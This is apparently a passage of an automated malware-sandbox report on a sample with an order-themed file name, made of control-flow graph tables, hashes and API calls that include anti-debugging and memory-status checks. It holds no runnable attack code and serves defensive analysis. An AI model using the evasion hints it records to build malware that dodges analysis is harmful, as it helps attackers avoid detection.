6675bd6-6675c03 3077->3089 3090 6675bd3 3077->3090 3087 6675b1f-6675b60 3085->3087 3088 6675b1c 3085->3088 3098 6675b62-6675b73 3087->3098 3099 6675b78-6675b89 3087->3099 3088->3087 3089->3053 3090->3089 3098->3053 3099->3053
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: b5b663a81591e5b960d73a1c28f37a6a54901eb4eb9770d87c2bc1a7eee64ef0
                                                                        • Instruction ID: 9701294252ba842a7cc3fb360f3b83ea77066d1ce88750ef37a073611512eefb
                                                                        • Opcode Fuzzy Hash: b5b663a81591e5b960d73a1c28f37a6a54901eb4eb9770d87c2bc1a7eee64ef0
                                                                        • Instruction Fuzzy Hash: 3E22E135E002199FDB64DBA4C4946AEBBB2FF85314F2484A9D44AAB344DE31DD42CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011470B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: a4a94171b4808b85801c065f588f57912d0281526af35cef1ca5906f82f30652
                                                                        • Instruction ID: 5983a1361ca0afee20e5338944318d479cae70a08851ed5365b42730abf8e67e
                                                                        • Opcode Fuzzy Hash: a4a94171b4808b85801c065f588f57912d0281526af35cef1ca5906f82f30652
                                                                        • Instruction Fuzzy Hash: E22145B1801259CFCB14CF9AD484BEEFBF4AF49320F14842AE458A3251C738AA44CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5abe997df88be1010635999cb04eecdb656245c699ed2d1c006ddb509bad9f8
                                                                        • Instruction ID: 2f2d4e3add737bb65546f8916ff5a1f691f4edad8922014ca3c2870a9bb4a70f
                                                                        • Opcode Fuzzy Hash: d5abe997df88be1010635999cb04eecdb656245c699ed2d1c006ddb509bad9f8
                                                                        • Instruction Fuzzy Hash: 4962AE34F106058FDB54DB68D594AADBBF2EF88314F248469E40AEB394DB35EC46CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 526 667ad18-667ad36 527 667ad38-667ad3b 526->527 528 667ad5e-667ad61 527->528 529 667ad3d-667ad59 527->529 530 667ad67-667ad6a 528->530 531 667af35-667af3e 528->531 529->528 535 667ad6c-667ad75 530->535 536 667ad7a-667ad7d 530->536 533 667af44-667af4e 531->533 534 667adbd-667adc6 531->534 537 667af4f-667af5d 534->537 538 667adcc-667add0 534->538 535->536 539 667ad87-667ad8a 536->539 540 667ad7f-667ad84 536->540 553 667afcf-667afdb 537->553 554 667af5f-667af86 537->554 545 667add5-667add8 538->545 542 667ada4-667ada7 539->542 543 667ad8c-667ad9f 539->543 540->539 547 667ada9-667adad 542->547 548 667adb8-667adbb 542->548 543->542 549 667adec-667adee 545->549 550 667adda-667ade7 545->550 547->533 556 667adb3 547->556 548->534 548->545 551 667adf5-667adf8 549->551 552 667adf0 549->552 550->549 551->527 557 667adfe-667ae22 551->557 552->551 564 667afe0-667afe3 553->564 558 667af88-667af8b 554->558 556->548 577 667af32 557->577 578 667ae28-667ae37 557->578 561 667af8d-667af97 558->561 562 667af98-667af9b 558->562 565 667af9d-667afa1 562->565 566 667afa8-667afab 562->566 567 667b24c-667b24e 564->567 568 667afe9-667b024 564->568 565->568 569 667afa3 565->569 570 667afad 566->570 571 667afba-667afbd 566->571 573 667b255-667b258 567->573 574 667b250 567->574 582 667b217-667b22a 568->582 583 667b02a-667b036 568->583 569->566 652 667afad call 667b270 570->652 653 667afad call 667b280 570->653 571->564 575 667afbf-667afcb 571->575 573->558 576 667b25e-667b268 573->576 574->573 575->553 577->531 586 667ae4f-667ae8a call 66765e8 578->586 587 667ae39-667ae3f 578->587 580 667afb3-667afb5 580->571 585 667b22c 582->585 591 667b056-667b09a 583->591 592 667b038-667b051 583->592 585->567 604 667aea2-667aeb9 586->604 605 667ae8c-667ae92 586->605 589 667ae43-667ae45 587->589 590 667ae41 587->590 589->586 590->586 606 667b0b6-667b0f5 591->606 607 667b09c-667b0ae 591->607 592->585 618 667aed1-667aee2 604->618 619 667aebb-667aec1 604->619 608 667ae96-667ae98 605->608 609 667ae94 605->609 613 667b1dc-667b1f1 606->613 614 667b0fb-667b1d6 call 66765e8 606->614 607->606 608->604 609->604 613->582 614->613 625 667aee4-667aeea 618->625 626 667aefa-667af2b 618->626 621 667aec5-667aec7 619->621 622 667aec3 619->622 621->618 622->618 628 667aeee-667aef0 625->628 629 667aeec 625->629 626->577 628->626 629->626 652->580 653->580
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-3823777903
                                                                        • Opcode ID: 828ca2bc065baeecbdbff97a7812beb72e1c72ec034ce6d1ff84f5848e66be94
                                                                        • Instruction ID: 76f58784750d60d869aa23eca5116635f559014ad7c9bf9cf2495a3a283634e6
                                                                        • Opcode Fuzzy Hash: 828ca2bc065baeecbdbff97a7812beb72e1c72ec034ce6d1ff84f5848e66be94
                                                                        • Instruction Fuzzy Hash: 4FE16D30E1020A8FDB69DFA9D5906AEB7B2FF89304F108529E409EB355DB35DC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1205 6679198-66791bd 1207 66791bf-66791c2 1205->1207 1208 66791c4-66791e3 1207->1208 1209 66791e8-66791eb 1207->1209 1208->1209 1210 66791f1-6679206 1209->1210 1211 6679aab-6679aad 1209->1211 1218 667921e-6679234 1210->1218 1219 6679208-667920e 1210->1219 1213 6679ab4-6679ab7 1211->1213 1214 6679aaf 1211->1214 1213->1207 1216 6679abd-6679ac7 1213->1216 1214->1213 1223 667923f-6679241 1218->1223 1220 6679212-6679214 1219->1220 1221 6679210 1219->1221 1220->1218 1221->1218 1224 6679243-6679249 1223->1224 1225 6679259-66792ca 1223->1225 1226 667924d-667924f 1224->1226 1227 667924b 1224->1227 1236 66792f6-6679312 1225->1236 1237 66792cc-66792ef 1225->1237 1226->1225 1227->1225 1242 6679314-6679337 1236->1242 1243 667933e-6679359 1236->1243 1237->1236 1242->1243 1248 6679384-667939f 1243->1248 1249 667935b-667937d 1243->1249 1254 66793a1-66793c3 1248->1254 1255 66793ca-66793d4 1248->1255 1249->1248 1254->1255 1256 66793d6-66793df 1255->1256 1257 66793e4-667945e 1255->1257 1256->1216 1263 6679460-667947e 1257->1263 1264 66794ab-66794c0 1257->1264 1268 6679480-667948f 1263->1268 1269 667949a-66794a9 1263->1269 1264->1211 1268->1269 1269->1263 1269->1264
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: bfde40ca285d566bf15cbfa79d240d746a8261597ebb6b4c1909bdc6b6700e2f
                                                                        • Instruction ID: 1b4e002245d1575c28d793fee94c12c9c2e0eec75021c4a74bda7e31c57739ae
                                                                        • Opcode Fuzzy Hash: bfde40ca285d566bf15cbfa79d240d746a8261597ebb6b4c1909bdc6b6700e2f
                                                                        • Instruction Fuzzy Hash: F0914130B1021A9FDB64DB65D950BAFB7F6AFC9304F108569C409EB748EE30DC468B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1272 667cf90-667cfab 1273 667cfad-667cfb0 1272->1273 1274 667cfb2-667cff4 1273->1274 1275 667cff9-667cffc 1273->1275 1274->1275 1276 667d006-667d009 1275->1276 1277 667cffe-667d003 1275->1277 1279 667d00b-667d00d 1276->1279 1280 667d018-667d01b 1276->1280 1277->1276 1283 667d013 1279->1283 1284 667d479 1279->1284 1281 667d03e-667d041 1280->1281 1282 667d01d-667d039 1280->1282 1287 667d043-667d085 1281->1287 1288 667d08a-667d08d 1281->1288 1282->1281 1283->1280 1285 667d47c-667d488 1284->1285 1289 667d2de-667d2ed 1285->1289 1290 667d48e-667d77b 1285->1290 1287->1288 1292 667d0d6-667d0d9 1288->1292 1293 667d08f-667d0d1 1288->1293 1296 667d2ef-667d2f4 1289->1296 1297 667d2fc-667d308 1289->1297 1484 667d9a2-667d9ac 1290->1484 1485 667d781-667d787 1290->1485 1298 667d0db-667d0dd 1292->1298 1299 667d0e8-667d0eb 1292->1299 1293->1292 1296->1297 1302 667d30e-667d320 1297->1302 1303 667d9ad-667d9e6 1297->1303 1300 667d337-667d340 1298->1300 1301 667d0e3 1298->1301 1304 667d134-667d137 1299->1304 1305 667d0ed-667d0fc 1299->1305 1311 667d342-667d347 1300->1311 1312 667d34f-667d35b 1300->1312 1301->1299 1329 667d325-667d327 1302->1329 1328 667d9e8-667d9eb 1303->1328 1314 667d180-667d183 1304->1314 1315 667d139-667d17b 1304->1315 1309 667d0fe-667d103 1305->1309 1310 667d10b-667d117 1305->1310 1309->1310 1310->1303 1318 667d11d-667d12f 1310->1318 1311->1312 1323 667d361-667d375 1312->1323 1324 667d46c-667d471 1312->1324 1320 667d185-667d19b 1314->1320 1321 667d1a0-667d1a3 1314->1321 1315->1314 1318->1304 1320->1321 1331 667d1a5-667d1e7 1321->1331 1332 667d1ec-667d1ef 1321->1332 1323->1284 1352 667d37b-667d38d 1323->1352 1324->1284 1338 667da1e-667da21 1328->1338 1339 667d9ed-667da19 1328->1339 1340 667d32e-667d331 1329->1340 1341 667d329 1329->1341 1331->1332 1335 667d1f1-667d233 1332->1335 1336 667d238-667d23b 1332->1336 1335->1336 1349 667d284-667d287 1336->1349 1350 667d23d-667d27f 1336->1350 1347 667da44-667da47 1338->1347 1348 667da23-667da3f 1338->1348 1339->1338 1340->1273 1340->1300 1341->1340 1356 667da56-667da58 1347->1356 1357 667da49 1347->1357 1348->1347 1349->1285 1353 667d28d-667d290 1349->1353 1350->1349 1370 667d3b1-667d3b3 1352->1370 1371 667d38f-667d395 1352->1371 1362 667d292-667d2d4 1353->1362 1363 667d2d9-667d2dc 1353->1363 1368 667da5f-667da62 1356->1368 1369 667da5a 1356->1369 1531 667da49 call 667db05 1357->1531 1532 667da49 call 667db18 1357->1532 1362->1363 1363->1289 1363->1329 1368->1328 1375 667da64-667da73 1368->1375 1369->1368 1381 667d3bd-667d3c9 1370->1381 1378 667d397 1371->1378 1379 667d399-667d3a5 1371->1379 1374 667da4f-667da51 1374->1356 1389 667da75-667dad8 call 66765e8 1375->1389 1390 667dada-667daef 1375->1390 1385 667d3a7-667d3af 1378->1385 1379->1385 1398 667d3d7 1381->1398 1399 667d3cb-667d3d5 1381->1399 1385->1381 1389->1390 1406 667d3dc-667d3de 1398->1406 1399->1406 1406->1284 1409 667d3e4-667d400 call 66765e8 1406->1409 1423 667d402-667d407 1409->1423 1424 667d40f-667d41b 1409->1424 1423->1424 1424->1324 1425 667d41d-667d46a 1424->1425 1425->1284 1486 667d796-667d79f 1485->1486 1487 667d789-667d78e 1485->1487 1486->1303 1488 667d7a5-667d7b8 1486->1488 1487->1486 1490 667d992-667d99c 1488->1490 1491 667d7be-667d7c4 1488->1491 1490->1484 1490->1485 1492 667d7c6-667d7cb 1491->1492 1493 667d7d3-667d7dc 1491->1493 1492->1493 1493->1303 1494 667d7e2-667d803 1493->1494 1497 667d805-667d80a 1494->1497 1498 667d812-667d81b 1494->1498 1497->1498 1498->1303 1499 667d821-667d83e 1498->1499 1499->1490 1502 667d844-667d84a 1499->1502 1502->1303 1503 667d850-667d869 1502->1503 1505 667d985-667d98c 1503->1505 1506 667d86f-667d896 1503->1506 1505->1490 1505->1502 1506->1303 1509 667d89c-667d8a6 1506->1509 1509->1303 1510 667d8ac-667d8c3 1509->1510 1512 667d8c5-667d8d0 1510->1512 1513 667d8d2-667d8ed 1510->1513 1512->1513 1513->1505 1518 667d8f3-667d90c call 66765e8 1513->1518 1522 667d90e-667d913 1518->1522 1523 667d91b-667d924 1518->1523 1522->1523 1523->1303 1524 667d92a-667d97e 1523->1524 1524->1505 1531->1374 1532->1374
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q
                                                                        • API String ID: 0-831282457
                                                                        • Opcode ID: c55a38ec1fa2541e2c534967e3dafcf702520c13bd4bace2e3a8cb5a4f108cdf
                                                                        • Instruction ID: c2d544e7f058c2de3ccd451962542d7a1c353c59ccc7635d6f653bd1f09e9d25
                                                                        • Opcode Fuzzy Hash: c55a38ec1fa2541e2c534967e3dafcf702520c13bd4bace2e3a8cb5a4f108cdf
                                                                        • Instruction Fuzzy Hash: 3A627430A002069FCB55EF68D690A5EB7F2FF84304F648A29D0099F759DB75ED4ACB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1533 6674bb0-6674bd4 1534 6674bd6-6674bd9 1533->1534 1535 6674bdf-6674cd7 1534->1535 1536 66752b8-66752bb 1534->1536 1556 6674cdd-6674d25 1535->1556 1557 6674d5a-6674d61 1535->1557 1537 66752bd-66752d7 1536->1537 1538 66752dc-66752de 1536->1538 1537->1538 1540 66752e5-66752e8 1538->1540 1541 66752e0 1538->1541 1540->1534 1543 66752ee-66752fb 1540->1543 1541->1540 1579 6674d2a call 6675459 1556->1579 1580 6674d2a call 6675468 1556->1580 1558 6674d67-6674dd7 1557->1558 1559 6674de5-6674dee 1557->1559 1576 6674de2 1558->1576 1577 6674dd9 1558->1577 1559->1543 1570 6674d30-6674d4c 1574 6674d57-6674d58 1570->1574 1575 6674d4e 1570->1575 1574->1557 1575->1574 1576->1559 1577->1576 1579->1570 1580->1570
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: fcq$XPcq$\Ocq
                                                                        • API String ID: 0-3575482020
                                                                        • Opcode ID: 672ec8c0c603016e5c1a415307f53a2c26c33ac032d2f8db12fbd700655e8558
                                                                        • Instruction ID: 9034490699e2f1353c2c96c48386f8fb5ed9cab08e436f4085d375895b8d7f6d
                                                                        • Opcode Fuzzy Hash: 672ec8c0c603016e5c1a415307f53a2c26c33ac032d2f8db12fbd700655e8558
                                                                        • Instruction Fuzzy Hash: 67615F30F102199FEB549FA8C8547AEBBF6FF88700F20852AE146AB394DE758C41CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2548 6679188-667918a 2549 6679191-6679192 2548->2549 2550 667918c-6679190 2548->2550 2552 6679193-6679198 2549->2552 2553 6679199-66791bd 2549->2553 2550->2549 2552->2553 2555 66791bf-66791c2 2553->2555 2556 66791c4-66791e3 2555->2556 2557 66791e8-66791eb 2555->2557 2556->2557 2558 66791f1-6679206 2557->2558 2559 6679aab-6679aad 2557->2559 2566 667921e-6679234 2558->2566 2567 6679208-667920e 2558->2567 2561 6679ab4-6679ab7 2559->2561 2562 6679aaf 2559->2562 2561->2555 2564 6679abd-6679ac7 2561->2564 2562->2561 2571 667923f-6679241 2566->2571 2568 6679212-6679214 2567->2568 2569 6679210 2567->2569 2568->2566 2569->2566 2572 6679243-6679249 2571->2572 2573 6679259-66792ca 2571->2573 2574 667924d-667924f 2572->2574 2575 667924b 2572->2575 2584 66792f6-6679312 2573->2584 2585 66792cc-66792ef 2573->2585 2574->2573 2575->2573 2590 6679314-6679337 2584->2590 2591 667933e-6679359 2584->2591 2585->2584 2590->2591 2596 6679384-667939f 2591->2596 2597 667935b-667937d 2591->2597 2602 66793a1-66793c3 2596->2602 2603 66793ca-66793d4 2596->2603 2597->2596 2602->2603 2604 66793d6-66793df 2603->2604 2605 66793e4-667945e 2603->2605 2604->2564 2611 6679460-667947e 2605->2611 2612 66794ab-66794c0 2605->2612 2616 6679480-667948f 2611->2616 2617 667949a-66794a9 2611->2617 2612->2559 2616->2617 2617->2611 2617->2612
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q
                                                                        • API String ID: 0-355816377
                                                                        • Opcode ID: 1d23ba0d4204a0fcbb914e1c7fc13199ce35632c2cdc92856f5ece43349d20e7
                                                                        • Instruction ID: 3c3cc048081102f2321c763f46edf0c263f6e5b095aeec8980217636f2268448
                                                                        • Opcode Fuzzy Hash: 1d23ba0d4204a0fcbb914e1c7fc13199ce35632c2cdc92856f5ece43349d20e7
                                                                        • Instruction Fuzzy Hash: 06516F30B101059FDB54EB74D991B6FB3F6ABC9304F148569C409EB798EE31DC428B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: f30465579b8106d345473f9c7feb587f83306ca8a0f0e62d5293e395a4175a46
                                                                        • Instruction ID: 7a0e53a3887297ebe4b46999da190f1cec4a2060162a18aa8ce0da327f9f645f
                                                                        • Opcode Fuzzy Hash: f30465579b8106d345473f9c7feb587f83306ca8a0f0e62d5293e395a4175a46
                                                                        • Instruction Fuzzy Hash: 36713370A00B458FD7A4DF6AE45079ABBF1FF88204F008A2DE49AD7B50D735E845CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: e4db9c82a66b3cf94d41a87e4158ac64c5ee9dc68e29afc021e0fe1515b69894
                                                                        • Instruction ID: 5a2ded42f522ad8f50d7931d45f040147c9162f11d0faa57ae1927577a38a081
                                                                        • Opcode Fuzzy Hash: e4db9c82a66b3cf94d41a87e4158ac64c5ee9dc68e29afc021e0fe1515b69894
                                                                        • Instruction Fuzzy Hash: E351E1B5C04249EFDF15CF9AD884ADEBFB5BF48304F14816AE818AB220D7719955CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 66a589778cd7de80a6d50b2fe633918629851cf4df034b08afd7525b64a95687
                                                                        • Instruction ID: 8577eacc9a4c15369a7c1eddd87e3d38146e14f0a4a714bc9f328de8ab72e928
                                                                        • Opcode Fuzzy Hash: 66a589778cd7de80a6d50b2fe633918629851cf4df034b08afd7525b64a95687
                                                                        • Instruction Fuzzy Hash: AB51D0B5D003489FDB14CF9AD884ADEFBB5BF48714F24852AE818AB210D7719845CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666EF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 81f46540072829dff7067c4f841eb5f88f6eb0730434666e54efa7e384e668cf
                                                                        • Instruction ID: d856a9cad96b9c66adad3104e71ab24f540042e9c9d9e5b9ee263f55755815af
                                                                        • Opcode Fuzzy Hash: 81f46540072829dff7067c4f841eb5f88f6eb0730434666e54efa7e384e668cf
                                                                        • Instruction Fuzzy Hash: FF41CFB5D00349DFDB14CF9AD884ADEBBB5BF88310F24852AE818AB210D7759945CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011470B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 650e3596b77b6a7691fdfff4249201c6fcd5dc76df6c8530e77b6e13bf115e79
                                                                        • Instruction ID: a6166aa8fb626ee559b9c5dc7a3a5dcb786b057160eeb9193d89dbee97ec1bc3
                                                                        • Opcode Fuzzy Hash: 650e3596b77b6a7691fdfff4249201c6fcd5dc76df6c8530e77b6e13bf115e79
                                                                        • Instruction Fuzzy Hash: C62136B1C01259CFCB14CF99D444BEEBBF4AF49320F14842AE859A3251D3389A44CF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066649E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 664b10accb97f00c4169df5395d927f339068b2ba079158dd90dd10f872974b0
                                                                        • Instruction ID: ade38538022747d51d363b3b64240261dec67c522992d3860e8c3b013582217c
                                                                        • Opcode Fuzzy Hash: 664b10accb97f00c4169df5395d927f339068b2ba079158dd90dd10f872974b0
                                                                        • Instruction Fuzzy Hash: BD21E3B5D00248DFDB10CFAAD984ADEBBF8FB48314F14811AE955A7310D774A940CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066649E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: c9aba759d634f58843b141b549157c4d6233839e492de955534ac1bd7e6e91f3
                                                                        • Instruction ID: 51072ed29397a06c6982953cceb2d4d04c2230e3c0c742377cc6bbcfc0d2d617
                                                                        • Opcode Fuzzy Hash: c9aba759d634f58843b141b549157c4d6233839e492de955534ac1bd7e6e91f3
                                                                        • Instruction Fuzzy Hash: 1121E3B5900248DFDB10CF9AD984ADEBBF4EB48314F14801AE954A3310C374A940CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0114F19F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: b66f8597a00f4b247158f36aee13960fd5b42c85fed4d67ad6940f46fa803b3e
                                                                        • Instruction ID: 7fe48a18c552514f1d5f8ab99229ca7a0a30aa3af15dda9fb20c2f240db48d7d
                                                                        • Opcode Fuzzy Hash: b66f8597a00f4b247158f36aee13960fd5b42c85fed4d67ad6940f46fa803b3e
                                                                        • Instruction Fuzzy Hash: 612142B6C0025A8FCB10CFA9C54479EFBB0AF08320F14816AD918B7251D338A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0666D0EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093220165.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6660000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: c5a0540aa424865448b6d0d5fe9d82e2c508758823f937217198153b09e48916
                                                                        • Instruction ID: 5a94f11528f10dad4ae115e25267bf60f50bf6557150c651b42c7be378eb1b77
                                                                        • Opcode Fuzzy Hash: c5a0540aa424865448b6d0d5fe9d82e2c508758823f937217198153b09e48916
                                                                        • Instruction Fuzzy Hash: A61123B6D002499FCB10CFAAD844ADEFBF8EF48710F10842AE419A7310C375A545CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0114F19F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4086615426.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1140000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: 0f983f0f362e7a4ebb4f1b13b35d46825a76306532924e0290b93501cebe4de1
                                                                        • Instruction ID: d5620388613cfccb90919f96ebd740b8492e2b563c8d7742e7ef9afdd1b12eb8
